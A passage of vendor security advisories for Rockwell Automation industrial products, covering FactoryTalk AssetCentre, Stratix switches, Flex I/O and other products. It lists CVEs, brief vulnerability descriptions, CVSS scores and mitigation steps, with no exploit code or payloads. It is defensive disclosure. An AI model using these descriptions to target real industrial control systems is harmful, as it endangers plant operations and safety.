A deserialization vulnerability exists in how the AosService.rem service in FactoryTalk AssetCentre verifies serialized data. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary commands in FactoryTalk AssetCentre.

CVSS v3.1 Base Score: 10/10[Critical]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2021-27466: Deserialization of untrusted data in ArchiveService.rem service may result in arbitrary command execution
A deserialization vulnerability exists in how the ArchiveService.rem service in FactoryTalk AssetCentre verifies serialized data. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary commands in FactoryTalk AssetCentre.

CVSS v3.1 Base Score: 10/10[Critical]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2021-27470: Deserialization of untrusted data in LogService.rem service may result in arbitrary command execution
A deserialization vulnerability exists in how the LogService.rem service in FactoryTalk AssetCentre verifies serialized data. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary commands in FactoryTalk AssetCentre.

CVSS v3.1 Base Score: 10/10[Critical]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2021-27474: Improperly restricted functions may result in loss of data integrity
FactoryTalk AssetCentre does not properly restrict all functions relating to IIS remoting services. This vulnerability may allow a remote, unauthenticated attacker to modify sensitive data in FactoryTalk AssetCentre.

CVSS v3.1 Base Score: 10/10[Critical]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2021-27476: RACompareService service vulnerable to OS command injection
A vulnerability exists in the SaveConfigFile function of the RACompareService service that may allow for OS Command Injection. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary commands in FactoryTalk AssetCentre.

CVSS v3.1 Base Score: 10/10[Critical]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2021-27472: SearchService service vulnerable to SQL injection
A vulnerability exists in the RunSearch function of SearchService service, which may allow for the execution of remote unauthenticated arbitrary SQL statements.

CVSS v3.1 Base Score: 10/10[Critical]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2021-27468: AosService.rem vulnerable to SQL injection
The AosService.rem service exposes functions that lack proper authentication. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary SQL statements.

CVSS v3.1 Base Score: 10/10[Critical]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2021-27464: ArchiveService.rem vulnerable to SQL injection
The ArchiveService.rem service exposes functions that lack proper authentication. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary SQL statements.

CVSS v3.1 Base Score: 10/10[Critical]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2021-27460: Server deserialization of untrusted data in .NET remoting endpoints may lead to remote code execution
FactoryTalk AssetCentre components contain .NET remoting endpoints that deserialize untrusted data without sufficiently verifying that the resulting data will be valid. This vulnerability may allow a remote, unauthenticated attacker to gain full access to the FactoryTalk AssetCentre main server and all agent machines.

CVSS v3.1 Base Score: 10/10[Critical]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Risk Mitigation & User Action

Vulnerability

Suggested Actions

CVE-2021-27462
CVE-2021-27466
CVE-2021-27470
CVE-2021-27474
CVE-2021-27476
CVE-2021-27472
CVE-2021-27468
CVE-2021-27464
CVE-2021-27460

Apply FactoryTalk AssetCentre v11 or above (Download).

As an additional mitigation, customers who are unable to upgrade or are concerned about unauthorized client connections are encouraged to deploy IPsec, a built in security feature found within FactoryTalk AssetCentre. Users should follow guidance found in QA46277. IPsec would minimize exposure to unauthorized clients and has been tested in FactoryTalk AssetCentre v9 – v11.

General Security Guidelines

Software/PC-based Mitigation Strategies

Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
Use of Microsoft^® AppLocker or other similar allow list application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article QA17329.
Confirm that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.

General Mitigations

Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article PN715.
Locate control system networks and devices behind firewalls and isolate them from the business network.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the KnoweldgeBase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS

Medium

PN1588 | PN1588 | File Parsing XML Entity in Multiple Products

Published Date:

March 28, 2021

Last Updated:

March 28, 2021

CVE IDs:

CVE-2022-1018

Products:

Using CCW with Micro800 Controllers, ISaGRAF, Using CCW with Component Class Drives, Using CCW with PanelView Component Terminals

CVSS Scores:

5.5

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Version 1.0 – March 28, 2021

Executive Summary

Rockwell Automation received a report from the researcher Kimiya through Trend Micro’s Zero Day Initiative which identified vulnerabilities in Connected Components Workbench, ISaGRAF Workbench and Safety Instrumented Systems Workbench for AADvance and Trusted controllers. If successfully exploited, these vulnerabilities may result in information leakage and loss of confidentiality. This vulnerability requires user interaction through a phishing attack, for example, to be successfully exploited.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

Connected Component Workbench Version 12.00 and Below
ISaGRAF Workbench 6.6.9 and below
Safety Instrumented Systems Workstation 1.1 and below

Vulnerability Details

CVE-2022-1018 XML External Entity Leads to Information Leak

When opening a malicious solution file provided by an attacker, the application suffers from an XML External Entity vulnerability due to an unsafe call within a dynamic link library file.

As a result, this could be exploited to pass data of local files of the victim to a remote web server controlled by an attacker leading to a loss of confidentiality.

CVSS v3.1 Base Score: 5.5/10 [Medium]
CVSS v3.1 Vector: AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Risk Mitigation & User Action

Customers using the affected versions of this software are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.

Product	Suggested Actions
Connected Components Workbench Version 12.00 and below	Customers should update to Version 13.00 which mitigates this vulnerability.
ISaGRAF Workbench 6.6.9 and below	It is recommended that customers follow the guidelines below until a patch is available.
SIS Workstation 1.1 and below	Customers should update to version 1.2 which mitigates this vulnerability.

If an upgrade is not possible or available, customers should consider deploying the following mitigations:

Run Connected Components Workbench as a User, not as an Administrator, to minimize the impact of malicious code on the infected system.
Do not open untrusted files with Connected Component Workbench, ISaGRAF, SISW. Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.
Use of Microsoft AppLocker or other similar allow list application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at QA17329 - Using Rockwell Automation Software Products with AppLocker
Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.

General Security Guidelines

Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.
Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet
Locate control system networks and devices behind firewalls and isolate them from the business network.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the PSIRT Inbox (PSIRT@rockwellautomation.com).

Additional Links

High

PN1558 | PN1558 | Stratix Switches Impacted by IOS and IOS XE Software Vulnerabilities

Published Date:

March 26, 2021

Last Updated:

March 26, 2021

CVE IDs:

CVE-2021-1452, CVE-2021-1442, CVE-2021-1443, CVE-2021-1392, CVE-2021-1403, CVE-2021-1220, CVE-2021-1352

Products:

Stratix 5400 Industrial Ethernet Switch, Stratix 8300 L3 Modular Managed Switch, Stratix 5410 Ind Distribution Switch, Stratix 8000 Modular Managed Switch

CVSS Scores:

7.8, 7.4, 6.8, 4.3, 5.5, 7.0

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Revision Number

1.0

Revision History

Version 1.0 - March 26, 2021. Initial release.

Executive Summary

Rockwell Automation received a report from Cisco regarding eight vulnerabilities in Stratix^® switches. If successfully exploited, these vulnerabilities may result in denial-of-service conditions, unauthorized privilege escalation, web socket hijacking, relative path traversal or command injection.

Customers using affected versions of this firmware are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

CVE ID	Affected Product Family	Affected Versions
CVE-2021-1392	Stratix 5800	16.12.01 and earlier
	Stratix 8000 Stratix 5700 Stratix 5410 Stratix 5400	15.2(7)E3 and earlier
	Stratix 8300	All Versions
CVE-2021-1403	Stratix 5800	16.12.01 and earlier
CVE-2021-1352	Stratix 5800	17.04.01 and earlier, if DECnet is enabled.
CVE-2021-1442	Stratix 5800	16.12.01 and earlier
CVE-2021-1452	Stratix 5800	16.12.01 and earlier
CVE-2021-1443	Stratix 5800	17.04.01 and earlier
CVE-2021-1220 CVE-2021- 1356	Stratix 5800	17.04.01 and earlier

Vulnerability Details

CVE-2021-1392: IOS and IOS XE Software Common Industrial Protocol (CIP) Privilege Escalation Vulnerability
A vulnerability in the CLI command permissions of Cisco® IOS and Cisco IOS XE software could allow an authenticated, local attacker to retrieve the password for Common Industrial Protocol (CIP™) and then remotely configure the affected device as an administrative user.

CVSS v3.1 Base Score: 7.8/10[High]
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2021-1403: IOS XE Software Web UI Cross-Site WebSocket Hijacking Vulnerability
A vulnerability in the web UI feature of Cisco IOS XE software could allow an unauthenticated, remote attacker to conduct a cross-site WebSocket hijacking (CSWSH) attack and cause a denial of service (DoS) condition on an affected device.

CVSS v3.1 Base Score: 7.4/10[High]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:H

CVE-2021-1352: IOS XE Software DECnet Phase IV/OSI Denial of Service Vulnerability
A vulnerability in the DECnet protocol processing of Cisco IOS XE software could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition on an affected device. An attacker could exploit this vulnerability by sending DECnet traffic to an affected device. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a DoS condition.

This vulnerability affects Stratix 5800 devices if they are running a vulnerable release of Cisco IOS XE software and have the DECnet protocol enabled. DECnet is not enabled by default.

CVSS v3.1 Base Score: 7.4 /10[High]
CVSS v3.1 Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

CVE-2021-1442: IOS XE Software Plug-and-Play Privilege Escalation Vulnerability
A vulnerability in a diagnostic command for the Plug and Play (PnP) subsystem of Cisco IOS XE software could allow an authenticated, local attacker to elevate privileges to the level of an Administrator on an affected Stratix 5800.

Plug and Play is disabled after Express Setup has completed.

CVSS v3.1 Base Score: 7.0/10[High]
CVSS v3.1 Vector: CVSS: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2021-1452: IOS XE ROM Monitor Software OS Command Injection Vulnerability
A vulnerability in the Stratix 5800 switches could allow an unauthenticated, physical attacker to execute persistent code at boot time and break the chain of trust.

CVSS v3.1 Base Score: 6.8/10[Medium]
CVSS v3.1 Vector: CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2021-1443: IOS XE Software Web UI OS Command Injection Vulnerability
A vulnerability in the web UI of the IOS XE software could allow a remote, authenticated attacker to execute arbitrary code with root privileges on the underlying operating system of the affected device. To exploit this vulnerability, an attacker would need to have Admin credentials to the device.

CVSS v3.1 Base Score: 5.5/10[Medium]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:N

CVE-2021-1220/CVE-2021- 1356: IOS XE Software Web UI Denial-of-Service Vulnerabilities
Multiple vulnerabilities in the Web UI feature of IOS XE software could allow an authenticated, remote attacker with read-only privileges to cause the web management software to hang and consume vty line instances resulting in a denial-of-service (DoS) condition.

CVSS v3.1 Base Score: 4.3/10[Medium]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Risk Mitigation & User Action

Customers using the affected Stratix devices are encouraged to update to an available firmware revision that addresses the associated risk.

Where a fix is not yet available, customers are directed towards the risk mitigation strategies provided below, and are encouraged, when possible, to apply general security guidelines to employ multiple strategies simultaneously.

Currently, Rockwell Automation is working to address these vulnerabilities and will continue to provide updates as these fixes become available.

CVE ID	Affected Product Family	Affected Firmware Versions	Suggested Actions
CVE-2021-1392	Stratix 5800	16.12.01 and earlier	Apply version 17.04.01 or later.
	Stratix 8000 Stratix 5700 Stratix 5410 Stratix 5400	15.2(7)E3 and earlier	Confirm that the least-privilege user principle is followed, and user account access to is only granted with a minimum number of rights as needed.
	Stratix 8300	All Versions	Migrate to contemporary solution.
CVE-2021-1403	Stratix 5800	16.12.01 and earlier	Apply version 17.04.01 or later.
CVE-2021-1352	Stratix 5800	17.04.01 and earlier, if DECnet is enabled.	If possible, disable DECnet protocol completely or on select interfaces. To reduce risk, customers should confirm they are employing proper network segmentation and security controls. Specifically, network exposure for all control system devices should be minimized, and control systems should be behind firewalls and isolated from other networks when possible. See the Converged Plantwide Ethernet (CPwE) Design and Implementation Guide for best practices deploying network segmentation and broader defense in depth strategies.
CVE-2021-1442	Stratix 5800	16.12.01 and earlier	Apply version 17.04.01 or later.
CVE-2021-1452	Stratix 5800	16.12.01 and earlier	Apply version 17.04.01 or later.
CVE-2021-1443	Stratix 5800	17.04.01 and earlier	Confirm that the least-privilege user principle is followed, and user account access to is only granted with a minimum number of rights as needed.
CVE-2021-1220 CVE-2021- 1356	Stratix 5800	17.04.01 and earlier	Confirm that the least-privilege user principle is followed, and user account access to is only granted with a minimum number of rights as needed.

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products

Us proper network infrastructure controls, such as firewalls, to help confirm that traffic from unauthorized sources is blocked.
Consult the product documentation for specific features, such as a hardware mode switch setting, to which may be used to block unauthorized changes, etc.

Software/PC-based Mitigation Strategies

Confirm that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.

General Mitigations

Use trusted firmware, antivirus/antimalware programs and interact only with trusted websites and attachments.

Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article PN715..
Locate control system networks and devices behind firewalls and isolate them from the business network.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

High

PN1551 | PN1551 | 1734-AENTR Series B and Series C Contains Multiple Web Vulnerabilities

Published Date:

March 04, 2021

Last Updated:

March 04, 2021

CVE IDs:

CVE-2020-14504, CVE-2020-14502

Products:

1734 Point I/O

CVSS Scores:

7.5, 4.7

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Revision Number

1.0

Revision History

Version 1.0 – March 4, 2021. Initial Release.

Executive Summary

Rockwell Automation received a report from Adam Eliot of the Loon Security Team regarding two vulnerabilities in the web interface of the 1734-AENTR Series B and Series C communications module. If successfully exploited, these vulnerabilities may lead to data modification on the device.

Customers using affected versions of this firmware are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

1734-AENTR Series B, versions 4.001 to 4.005, and 5.011 to 5.01.
1734-AENTR Series C, versions 6.011 and 6.012.

Vulnerability Details

CVE-2020-14504: Unauthenticated HTTP POST Requests
The web interface of the 1734-AENTR communication module mishandles authentication for HTTP POST requests. A remote, unauthenticated attacker can send a crafted request which may allow for modification of the configuration settings.

CVSSv3.1 Base Score: 7.5/10 [HIGH]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CVE-2020-14502: Stored Cross Site Scripting (XXS)
The web interface of the 1734-AENTR Communications module is vulnerable to stored XSS. A remote, unauthenticated attacker could store a malicious script within the web interface that, when executed, could modify some string values on the “Home” page of the web interface.

CVSS v3.1 Base Score: 4.7/10 [MEDIUM]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N

Risk Mitigation & User Action

Customers using the affected 1734-AENTR Series B and Series C are encouraged to update to an available firmware version that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.

Vulnerability Details	Recommended User Actions
CVE-2020-14504 CVE-2020-14502	1734-AENTR Series B, update to firmware version 5.018. (Download). 1734-AENTR Series C, update to firmware version 6.013. (Download).

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products

Utilize proper network infrastructure controls, such as firewalls, to help ensure that traffic from unauthorized sources are blocked.

General Mitigations

Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article PN715
Locate control system networks and devices behind firewalls and isolate them from the business network.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the KnoweldgeBase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

High

PN1543 | PN1543 | Writable Path Directory in DriveTools SP and Drives AOP

Published Date:

February 15, 2021

Last Updated:

February 15, 2021

CVE IDs:

CVE-2021-22665

Products:

9303 DriveTools SP

CVSS Scores:

7.5

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Revision Number

1.1

Executive Summary

Rockwell Automation received a report from both Cim Stordal of Cognite and Claroty regarding a vulnerability in DriveTools™ and Drives AOP. If successfully exploited, this vulnerability may result in privilege escalation and total loss of device confidentiality, integrity, and availability.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Special thanks to both Cognite and Claroty for their work discovering this vulnerability.

Affected Products

DriveExecutive v5.13 and below.
DriveTools SP v5.13 and below.
Drives AOP v4.12 and below.

Vulnerability Details

CVE-2021-22665: Privilege Escalation Vulnerability due to Uncontrolled Search Path Element
DriveTools and Drives AOP both contain a vulnerability that a local attacker with limited privileges may be able to exploit resulting in privilege escalation and complete control of the system.

CVSS v3.1 Score: 7.5/10 High
CVSS v3.1 Vector String: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H

Risk Mitigation & User Action

Customers using the affected versions are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are directed towards the risk mitigation strategies provided below and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.

Vulnerability	Suggested Actions
CVE-2021-22665	Apply DriveTools SP v5.14 or later Download). Apply Drives AOP v4.13 or later (Download).

Customers using affected versions can reach out to their account manager or distributor to request a newer version.

General Security Guidelines

Software/PC-based Mitigation Strategies

Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
Use of Microsoft AppLocker or other similar allow list application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article QA17329 .
Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum amount of rights as needed.

General Mitigations

Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.
Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article PN715.
Locate control system networks and devices behind firewalls and isolate them from the business network.

When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the KnoweldgeBase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS

High

PN1531 | PN1531 | 1794-AENT Flex I/O Series B Contains Multiple Denial of Service Vulnerabilities

Published Date:

February 02, 2021

Last Updated:

February 02, 2021

CVE IDs:

CVE-2020-6085, CVE-2020-6084, CVE-2020-6088, CVE-2020-6083, CVE-2020-6087, CVE-2020-6086

Products:

Flex I/O, 1794 Flex, 1794/5094 Distributed I/O

CVSS Scores:

7.5

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Revision Number

1.1

Revision History

November 4, 2020 - Version 1.1. Updated Vulnerability Details.

October 12, 2020 - Version 1.0. Initial Version.

Revision History

Revision Number

2.0

Revision History

February 2, 2021 - Version 2.0. Updated Risk Mitigation & User Actions.

Executive Summary

Rockwell Automation received a report from Jared Rittle of Cisco Talos regarding three vulnerabilities in the 1794-AENT Flex I/O Series B adapter. If successfully exploited, these vulnerabilities may lead to denial-of-service conditions.

Customers using affected versions of this firmware are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

1794-AENT Flex I/O, Series B, versions 4.003 (and earlier).

Vulnerability Details

CVE-2020-6083: Denial of Service due to Ethernet/IP Request Path Port Segment Buffer Overflow
A buffer overflow vulnerability exists in the Ethernet/IP Request Path Port Segment. This vulnerability could allow a remote, unauthenticated attacker to send a malicious packet resulting in a denial-of-service condition on the device.

CVSS v3.1 Base Score: 7.5 /10 [HIGH]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2020-6084, CVE-2020-6085: Denial of Service due to Ethernet/IP Request Path Logical Segment Buffer Overflow
A buffer overflow vulnerability exists in the Ethernet/IP Request Path Logical Segment. This vulnerability could allow a remote unauthenticated attacker to send a malicious packet resulting in the device entering a fault state causing a denial-of-service condition.

CVSS v3.1 Base Score:7.5 /10 [HIGH]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2020-6086, CVE-2020-6087: Denial of Service due to Ethernet/IP Request Path Data Segment Buffer Overflow
A buffer overflow vulnerability exists in the Ethernet/IP Request Path Data Segment. This vulnerability could allow a remote unauthenticated attacker to send a malicious packet resulting in the device entering a fault state causing a denial-of-service condition.

CVSS v3.1 Base Score:7.5 /10 [HIGH]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Version 1.1 Update:
CVE-2020-6088: Denial of Service due to Ethernet/IP Request Path Network Segment Buffer Overflow
A buffer overflow vulnerability exists in the Ethernet/IP Request Path Network Segment. This vulnerability could allow a remote, unauthenticated attacker to send a malicious packet resulting in a denial-of-service condition on the device.

CVSS v3.1 Base Score: 7.5 /10 [HIGH]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Risk Mitigation & User Action

Customers using the affected firmware versions are directed towards risk mitigation. They are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense in depth strategy. Please subscribe to updates to this advisory and the Industrial Security Advisory Index to stay notified.

Vulnerabilities	Affected Products	Suggested Mitigations
CVE-2020-6083 CVE-2020-6084 CVE-2020-6085 CVE-2020-6086 CVE-2020-6087 CVE-2020-6088	1794-AENT Flex I/O, Series B, firmware versions 4.003 and earlier	Version 2.0: Apply firmware v4.004 (download). Version 1.0: It is recommended for customers to use this module in the Cell Area/Zone (Level 1) as defined on page 16 of the System Security Design Guidelines and only accept CIP connections from trusted sources via port 44818. For successful exploitation, these vulnerabilities require Ethernet/IP packets to reach the destination device. To reduce risk, customers should ensure they are employing proper network segmentation and security controls. Specifically, network exposure for all control system devices should be minimized and control systems should be behind firewalls and isolated from other networks when possible. Refer to the Converged Plantwide Ethernet (CPwE) Design and Implementation Guide for best practices deploying network segmentation and broader defense-in-depth strategies Customers should consider using proper network infrastructure controls, such as firewalls, UTM devices, VPN, or other security appliances.

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products

Utilize proper network infrastructure controls, such as firewalls, to help ensure that traffic from unauthorized sources are blocked.

Social Engineering Mitigation Strategies

Do not click on or open URL links from untrusted sources.
Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.

General Mitigations Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.

Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID PN715.
Locate control system networks and devices behind firewalls and isolate them from the business network.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).
Please direct all media inquiries to Kolve Byrd (kabyrd@rockwellautomation.com).

High

PN1545 | PN1545 | Modbus Vulnerability may lead to Denial-of-Service conditions in the MicroLogix 1400 Controller

Published Date:

January 28, 2021

Last Updated:

January 28, 2021

CVE IDs:

CVE-2021-22659

Products:

1766 MicroLogix 1400

CVSS Scores:

8.1

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Revision Number

1.0

Revision History

Version 1.0 - January 28, 2021. Initial release.

Executive Summary

Rockwell Automation received a report from Parul Sindhwad and Dr. Faruk Kazi from COE-CNDS, Veermata Jijabai Technological Institute (VJTI), India regarding a vulnerability in the MicroLogix™ 1400 controller. If successfully exploited, this vulnerability may result in denial-of-service conditions.

This vulnerability does not impact MicroLogix 1400 controller users who have Modbus TCP disabled.

Customers using affected versions of this controller are encouraged to evaluate the following mitigations and apply them appropriately to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

MicroLogix 1400, all series version 21.6 and below.

Vulnerability Details

CVE-2021-22659: Buffer Overflow may lead to Denial-of-Service Conditions
